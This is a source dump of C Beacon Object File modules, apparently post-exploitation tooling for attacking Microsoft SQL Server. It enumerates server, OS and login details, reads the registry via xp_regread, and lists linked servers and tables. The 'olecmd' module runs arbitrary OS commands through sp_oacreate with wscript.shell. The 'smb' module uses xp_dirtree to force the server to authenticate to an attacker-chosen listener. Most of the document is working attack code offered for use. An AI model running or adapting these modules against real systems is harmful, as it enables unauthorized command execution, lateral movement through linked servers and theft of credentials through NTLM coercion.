                 "SELECT @ForcedEncryption;";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.ForcedEncryption = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT CASE  SERVERPROPERTY('IsClustered')\n"
                     "WHEN 0\n"
                     "THEN 'No'\n"
                     "ELSE 'Yes'\n"
                     "END";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.Clustered = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT CONVERT(VARCHAR(255), SERVERPROPERTY('productversion'));";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.SqlServerVersionNumber = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4);";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.SqlServerMajorVersion = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT CONVERT(VARCHAR(255), SERVERPROPERTY('Edition'));";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.SqlServerEdition = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT CONVERT(VARCHAR(255), SERVERPROPERTY('ProductLevel'));";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.SqlServerServicePack = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3);";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.OsArchitecture = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  if (info.IsSysAdmin) {
    query =
        (SQLCHAR *)"DECLARE @MachineType  SYSNAME\n"
                   "EXECUTE master.dbo.xp_regread\n"
                   "@rootkey		= N'HKEY_LOCAL_MACHINE',\n"
                   "@key			= "
                   "N'SYSTEM\\CurrentControlSet\\Control\\ProductOptions',\n"
                   "@value_name	= N'ProductType',\n"
                   "@value			= @MachineType output\n"
                   "SELECT @MachineType;";
    if (!ExecuteQuery(stmt, query)) {
      goto END;
    }
    info.OsMachineType = GetSingleResult(stmt, FALSE);
    ODBC32$SQLCloseCursor(stmt);
  }

  if (info.IsSysAdmin) {
    query = (SQLCHAR *)"DECLARE @ProductName  SYSNAME\n"
                       "EXECUTE master.dbo.xp_regread\n"
                       "@rootkey		= N'HKEY_LOCAL_MACHINE',\n"
                       "@key			= "
                       "N'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion',\n"
                       "@value_name	= N'ProductName',\n"
                       "@value			= @ProductName output\n"
                       "SELECT @ProductName;";
    if (!ExecuteQuery(stmt, query)) {
      goto END;
    }
    info.OsVersion = GetSingleResult(stmt, FALSE);
    ODBC32$SQLCloseCursor(stmt);
  }

  query = (SQLCHAR *)"SELECT RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows Server', @@VERSION), 19), 4);";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.OsVersionNumber = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT SYSTEM_USER;";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.CurrentLogin = GetSingleResult(stmt, FALSE);
  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT COUNT(*) FROM [sys].[dm_exec_sessions] WHERE status = 'running';";
  if (!ExecuteQuery(stmt, query)) {
    goto END;
  }
  info.ActiveSessions = GetSingleResult(stmt, FALSE);

  internal_printf("%-30s: %s\n", " |--> ComputerName", info.ComputerName);
  internal_printf("%-30s: %s\n", " |--> DomainName", info.DomainName);
  internal_printf("%-30s: %s\n", " |--> ServicePid", info.ServicePid);
  internal_printf("%-30s: %s\n", " |--> ServiceName", info.ServiceName);
  internal_printf("%-30s: %s\n", " |--> ServiceAccount", info.ServiceAccount);
  internal_printf("%-30s: %s\n", " |--> AuthenticationMode", info.AuthenticationMode);
  internal_printf("%-30s: %s\n", " |--> ForcedEncryption", info.ForcedEncryption);
  internal_printf("%-30s: %s\n", " |--> Clustered", info.Clustered);
  internal_printf("%-30s: %s\n", " |--> SqlServerVersionNumber", info.SqlServerVersionNumber);
  internal_printf("%-30s: %s\n", " |--> SqlServerMajorVersion", info.SqlServerMajorVersion);
  internal_printf("%-30s: %s\n", " |--> SqlServerEdition", info.SqlServerEdition);
  internal_printf("%-30s: %s\n", " |--> SqlServerServicePack", info.SqlServerServicePack);
  internal_printf("%-30s: %s\n", " |--> OsArchitecture", info.OsArchitecture);

  if (info.IsSysAdmin) {
    internal_printf("%-30s: %s\n", " |--> OsMachineType", info.OsMachineType);
    internal_printf("%-30s: %s\n", " |--> OsVersion", info.OsVersion);
  }

  internal_printf("%-30s: %s\n", " |--> OsVersionNumber", info.OsVersionNumber);
  internal_printf("%-30s: %s\n", " |--> CurrentLogin", info.CurrentLogin);
  internal_printf("%-30s: %s\n", " |--> IsSysAdmin", info.IsSysAdmin ? "True" : "False");
  internal_printf("%-30s: %s\n", " |--> ActiveSessions", info.ActiveSessions);

END:
  FreeSqlInfo(&info);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server = NULL;
  char *database = NULL;
  char *user = NULL;
  char *password = NULL;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);
  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  GetSQLInfo(server, database, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/links/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CheckLinks(char *server, char *database, char *link, char *impersonate, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Enumerating linked servers on %s\n\n", server);
  } else {
    internal_printf("[*] Enumerating linked servers on %s via %s\n\n", link, server);
  }

  ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);

  SQLCHAR *query = (SQLCHAR *)"SELECT name, product, provider, data_source FROM sys.servers WHERE is_linked = 1;";
  if (!HandleQuery(stmt, query, link, impersonate, FALSE)) {
    goto END;
  }
  PrintQueryResults(stmt, TRUE);

END:
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  CheckLinks(server, database, link, impersonate, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/olecmd/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"
#include "sql_modules.c"

void ExecuteOleCmd(char *server, char *database, char *link, char *impersonate, char *command, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  SQLRETURN ret;
  char *query;
  size_t totalSize;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  if (IsModuleEnabled(stmt, "OLE Automation Procedures", link, impersonate)) {
    internal_printf("[*] OLE Automation Procedures is enabled\n");
  } else {
    internal_printf("[!] OLE Automation Procedures is not enabled\n");
    goto END;
  }

  ODBC32$SQLCloseCursor(stmt);

  if (link != NULL) {
    if (IsRpcEnabled(stmt, link)) {
      internal_printf("[*] RPC out is enabled\n");
    } else {
      internal_printf("[!] RPC out is not enabled\n");
      goto END;
    }

    ODBC32$SQLCloseCursor(stmt);
  }

  internal_printf("[*] Executing system command...\n\n");

  InitRandomSeed();
  char *output = GenerateRandomString(8);
  char *program = GenerateRandomString(8);

  internal_printf("[*] Setting sp_oacreate to \"%s\"\n", output);
  internal_printf("[*] Setting sp_oamethod to \"%s\"\n", program);

  char *linkPrefix = "SELECT 1; ";
  char *part1 = "DECLARE @";            // followed by output
  char *part2 = " INT; DECLARE @";      // followed by program
  char *part3 = " VARCHAR(255); SET @"; // followed by program
  char *part4 = " = 'Run(\"";           // followed by command
  char *part5 =
      "\")'; EXEC sp_oacreate 'wscript.shell', @"; // followed by output
  char *part6 = " out; EXEC sp_oamethod @";        // followed by output
  char *part7 = ", @";                             // followed by program
  char *part8 = "; EXEC sp_oadestroy @";           // followed by output
  char *part9 = ";";

  if (link == NULL) {
    totalSize =
        MSVCRT$strlen(part1) + MSVCRT$strlen(output) + MSVCRT$strlen(part2) +
        MSVCRT$strlen(program) + MSVCRT$strlen(part3) + MSVCRT$strlen(program) +
        MSVCRT$strlen(part4) + MSVCRT$strlen(command) + MSVCRT$strlen(part5) +
        MSVCRT$strlen(output) + MSVCRT$strlen(part6) + MSVCRT$strlen(output) +
        MSVCRT$strlen(part7) + MSVCRT$strlen(program) + MSVCRT$strlen(part8) +
        MSVCRT$strlen(output) + MSVCRT$strlen(part9) + 1;
    query = (char *)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, part1);
  } else {
    totalSize =
        MSVCRT$strlen(linkPrefix) + MSVCRT$strlen(part1) +
        MSVCRT$strlen(output) + MSVCRT$strlen(part2) + MSVCRT$strlen(program) +
        MSVCRT$strlen(part3) + MSVCRT$strlen(program) + MSVCRT$strlen(part4) +
        MSVCRT$strlen(command) + MSVCRT$strlen(part5) + MSVCRT$strlen(output) +
        MSVCRT$strlen(part6) + MSVCRT$strlen(output) + MSVCRT$strlen(part7) +
        MSVCRT$strlen(program) + MSVCRT$strlen(part8) + MSVCRT$strlen(output) +
        MSVCRT$strlen(part9) + 1;
    query = (char *)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, linkPrefix);
    MSVCRT$strncat(query, part1, totalSize - MSVCRT$strlen(query) - 1);
  }

  MSVCRT$strncat(query, output, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, part2, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, program, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, part3, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, program, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, part4, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, command, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, part5, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, output, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, part6, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, output, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, part7, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, program, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, part8, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, output, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, part9, totalSize - MSVCRT$strlen(query) - 1);

  if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, TRUE)) {
    goto END;
  }

  internal_printf("[*] Command executed\n");
  internal_printf("[*] Destoryed \"%s\" and \"%s\"\n", output, program);

END:
  if (output != NULL)
    intFree(output);
  if (program != NULL)
    intFree(program);
  if (query != NULL)
    intFree(query);

  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *command;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  command = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  ExecuteOleCmd(server, database, link, impersonate, command, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/query/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CustomQuery(char *server, char *database, char *link, char *impersonate, char *query, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Executing custom query on %s\n\n", server);
  } else {
    internal_printf("[*] Executing custom query on %s via %s\n\n", link,
                    server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, FALSE)) {
    goto END;
  }
  PrintQueryResults(stmt, TRUE);

END:
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *query;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  query = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  if (query == NULL) {
    return;
  }

  CustomQuery(server, database, link, impersonate, query, user, password);

  printoutput(TRUE);
}

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/rows/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CheckTableRows(char *server, char *database, char *link, char *impersonate, char *table, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  char *useStmt = NULL;
  char *query = NULL;
  char *schema = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Getting row count from table %s in %s on %s\n\n", table, database, server);
  } else {
    internal_printf("[*] Getting row count from table %s in %s on %s via %s\n\n", table, database, link, server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  char *dbPrefix = "USE ";
  char *dbSuffix = "; ";
  char *tablePrefix = "SELECT COUNT(*) as row_count FROM ";
  char *tableSuffix = ";";

  if (link == NULL) {
    size_t useStmtSize = MSVCRT$strlen(dbPrefix) + MSVCRT$strlen(database) + MSVCRT$strlen(dbSuffix) + 1;
    useStmt = (char *)intAlloc(useStmtSize * sizeof(char));

    MSVCRT$strcpy(useStmt, dbPrefix);
    MSVCRT$strncat(useStmt, database, useStmtSize - MSVCRT$strlen(useStmt) - 1);
    MSVCRT$strncat(useStmt, dbSuffix, useStmtSize - MSVCRT$strlen(useStmt) - 1);

    if (!HandleQuery(stmt, (SQLCHAR *)useStmt, link, impersonate, TRUE)) {
      goto END;
    }

    size_t totalSize = MSVCRT$strlen(tablePrefix) + MSVCRT$strlen(table) + MSVCRT$strlen(tableSuffix) + 1;
    query = (char *)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, tablePrefix);
    MSVCRT$strncat(query, table, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, tableSuffix, totalSize - MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, TRUE)) {
      goto END;
    }

    PrintQueryResults(stmt, TRUE);
  } else {
    char *sep = ".";

    if (!GetTableShema(stmt, link, database, table)) {
      internal_printf("[!] Failed to get table schema for %s\n", table);
      goto END;
    }

    schema = GetSingleResult(stmt, FALSE);
    internal_printf("[*] Table schema for %s is: %s\n\n", table, schema);

    ret = ODBC32$SQLCloseCursor(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Error closing cursor\n");
      goto END;
    }

    size_t totalSize = MSVCRT$strlen(tablePrefix) + MSVCRT$strlen(database) +
                       MSVCRT$strlen(sep) + MSVCRT$strlen(schema) +
                       MSVCRT$strlen(sep) + MSVCRT$strlen(table) +
                       MSVCRT$strlen(tableSuffix) + 1;
    query = (char *)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, tablePrefix);
    MSVCRT$strncat(query, database, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, sep, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, schema, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, sep, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, table, totalSize - MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, TRUE)) {
      goto END;
    }

    PrintQueryResults(stmt, TRUE);
  }

END:
  if (useStmt != NULL)
    intFree(useStmt);
  if (query != NULL)
    intFree(query);
  if (schema != NULL)
    intFree(schema);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *table;
  char *link;
  char *impersonate;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  table = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  table = *table == 0 ? NULL : table;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (table == NULL) {
    internal_printf("[!] Table argument is required\n");
    printoutput(TRUE);
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  CheckTableRows(server, database, link, impersonate, table, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/search/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void Search(char *server, char *database, char *link, char *impersonate, char *keyword, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  char *query = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf( "[*] Searching for columns containing \"%s\" in %s on %s\n\n", keyword, database, server);
  } else {
    internal_printf( "[*] Searching for columns containing \"%s\" in %s on %s via %s\n\n", keyword, database, link, server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  char *prefix = "SELECT table_name, column_name FROM ";
  char *middle = ".information_schema.columns WHERE column_name LIKE '%";
  char *suffix = "%';";

  size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(database) +
                     MSVCRT$strlen(middle) + MSVCRT$strlen(keyword) +
                     MSVCRT$strlen(suffix) + 1;
  query = (char *)intAlloc(totalSize * sizeof(char));

  MSVCRT$strcpy(query, prefix);
  MSVCRT$strncat(query, database, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, middle, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, keyword, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

  if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, TRUE)) {
    goto END;
  }

  PrintQueryResults(stmt, TRUE);

END:
  if (query != NULL)
    intFree(query);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *keyword;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  keyword = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  Search(server, database, link, impersonate, keyword, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/smb/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CoerceSmb(char *server, char *database, char *link, char *impersonate, char *listener, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  char *query = NULL;
  SQLRETURN ret;
  size_t totalSize;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  char *linkPrefix = "SELECT 1; ";
  char *prefix = "EXEC master..xp_dirtree '";
  char *suffix = "';";

  if (link == NULL) {
    internal_printf("[*] Triggering SMB request to %s on %s\n\n", listener, server);
    totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(listener) + MSVCRT$strlen(suffix) + 1;
    query = (char *)intAlloc(totalSize * sizeof(char));
    MSVCRT$strcpy(query, prefix);
  } else {
    internal_printf("[*] Triggering SMB request to %s on %s via %s\n\n", listener, link, server);
    totalSize = MSVCRT$strlen(linkPrefix) + MSVCRT$strlen(prefix) + MSVCRT$strlen(listener) + MSVCRT$strlen(suffix) + 1;
    query = (char *)intAlloc(totalSize * sizeof(char));
    MSVCRT$strcpy(query, linkPrefix);
    MSVCRT$strncat(query, prefix, totalSize - MSVCRT$strlen(linkPrefix) - 1);
  }

  MSVCRT$strncat(query, listener, totalSize - MSVCRT$strlen(linkPrefix) - 1);
  MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(linkPrefix) - 1);

  if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, TRUE)) {
    goto END;
  }

  internal_printf("[*] SMB request triggered\n");

END:
  if (query != NULL)
    intFree(query);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *listener;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  listener = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  CoerceSmb(server, database, link, impersonate, listener, user, password);

  printoutput(TRUE);
};


================================================
FILE: AD-BOF/SQL-BOF/src/SQL/tables/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CheckTables(char *server, char *database, char *link, char *impersonate, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  char *query = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Enumerating tables in the %s database on %s\n\n", database, server);
  } else {
    internal_printf( "[*] Enumerating tables in the %s database on %s via %s\n\n", database, link, server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Error allocating statement handle\n");
    goto END;
  }

  char *prefix = "SELECT * FROM ";
  char *suffix = ".INFORMATION_SCHEMA.TABLES;";

  size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(database) + MSVCRT$strlen(suffix) + 1;
  query = (char *)intAlloc(totalSize * sizeof(char));

  MSVCRT$strcpy(query, prefix);
  MSVCRT$strncat(query, database, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

  if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, FALSE)) {
    goto END;
  }

  PrintQueryResults(stmt, TRUE);

END:
  if (query != NULL)
    intFree(query);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  CheckTables(server, database, link, impersonate, user, password);

  printoutput(TRUE);
};

================================================
